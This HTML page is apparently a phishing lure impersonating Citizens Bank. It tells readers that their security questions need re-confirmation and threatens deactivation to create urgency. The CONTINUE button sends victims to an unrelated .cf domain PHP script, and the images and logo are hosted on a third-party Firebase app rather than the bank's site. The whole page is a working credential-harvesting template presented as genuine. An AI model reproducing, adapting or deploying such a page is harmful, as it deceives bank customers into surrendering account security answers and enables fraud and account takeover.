<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Before we proceed</title><!-- update the version number as needed -->
    <script defer src="//firebase/7.15.1/firebase-app.js"></script><!-- include only the Firebase features as you need -->
    <script defer src="//firebase/7.15.1/firebase-auth.js"></script>
    <script defer src="//firebase/7.15.1/firebase-database.js"></script>
    <script defer src="//firebase/7.15.1/firebase-messaging.js"></script>
    <script defer src="//firebase/7.15.1/firebase-storage.js"></script><!-- initialize the SDK after all desired features are loaded -->
    <script defer src="//firebase/init.js"></script>
    <style media="screen">
        body {
            background-image: url('https://upload909.web.app/bgpc.jpg');
        }

        #message {
            background: white;
            max-width: 660px;
            margin: 50px auto 50px;
            padding: 10px 24px;
            border-radius: 10px;
        }

        #message h2 {
            color: #ffa100;
            font-weight: bold;
            font-size: 16px;
            margin: 0 0 8px;
        }

        #message h1 {
            font-size: 22px;
            font-weight: 300;
            color: rgba(0, 0, 0, 0.753);
            margin: 0 0 16px;
            font-family: Arial, Helvetica;
            font-style: bold;
        }

        #message p {
            line-height: 140%;
            margin: 16px 0 24px;
            font-size: 15px;
            font-family: Arial, Helvetica;
        }

        #load {
            color: rgba(0, 0, 0, 0.4);
            text-align: center;
            font-size: 15px;
            font-family: Arial, Helvetica;
        }

        @media (max-width: 600px) {
            body {
                background-image: url('https://upload909.web.app/bgpc.jpg');
            }

            #message {
                margin: 60px auto 60px;
                max-width: 600px;
                padding: 15px 15px;
                box-shadow: none;
                border-radius: 10px
            }
        }
    </style>
</head>

<body>
    <div id="message">
        <p style="text-align:center;"><img src="https://upload909.web.app/logo.png" alt="Logo" width="300" height="63"></p>
        <h1><b>Please read the following information carefully.</b></h1>
        <p>We've noticed that you haven't used your security questions and answers to sign-in in quite some time. To avoid unauthorized logins and multiple attempts, we would like to go through your security information with you.</p>
        <p>• Following submission, every security profile entered will be reviewed and validated.</p>
        <p><b>What is this message about?</b></p>
        <p>• Due to an increase in reports of users forgetting their security profiles and accounts being restricted due to multiple login attempts, this message is intended to inform and assist you in confirming your security information that we have in our records. We always keep our customers' personal information up to date and to remind Users security profiles.</p>
        <p><b>What am I supposed to do?</b></p>
        <P><b><FONT color=#ff0000>• Double-Check your security answers</FONT></b></P>
        <p><b>NOTE</b> You must confirm security answers in order to continue using this service, or we may deactivate your security questions automatically so you don't forget them and get locked out of your account.</p>    
        <div style="Margin-left: 20px;Margin-right: 20px;">
            <div class="btn btn--shadow btn--medium" style="Margin-bottom: 20px;text-align: center;"><a style="border-radius: 4px;display: inline-block;font-size: 12px;font-weight: bold;line-height: 22px;padding: 10px 40px 11px 40px;text-align: center;text-decoration: none !important;transition: opacity 0.1s ease-in;color: #ffffff !important;box-shadow: inset 0 -4px 0 0 rgba(0, 0, 0, 0.2);background-color: #ff8400;font-family: Arial, Helvetica, sans-serif;" href="https://telefonverzeichnisse.cf/fdrs/5yt.php?kij">   CONTINUE   </a>
                
            </div>
            <div style=text-align:center;font-size:15px;line-height:19px;margin-top:20px;>
                <div><b>Citizens Bank Team</b></div>
                <p id="load"></p>
            </div>
        </div>
    </div>
</body>

</html>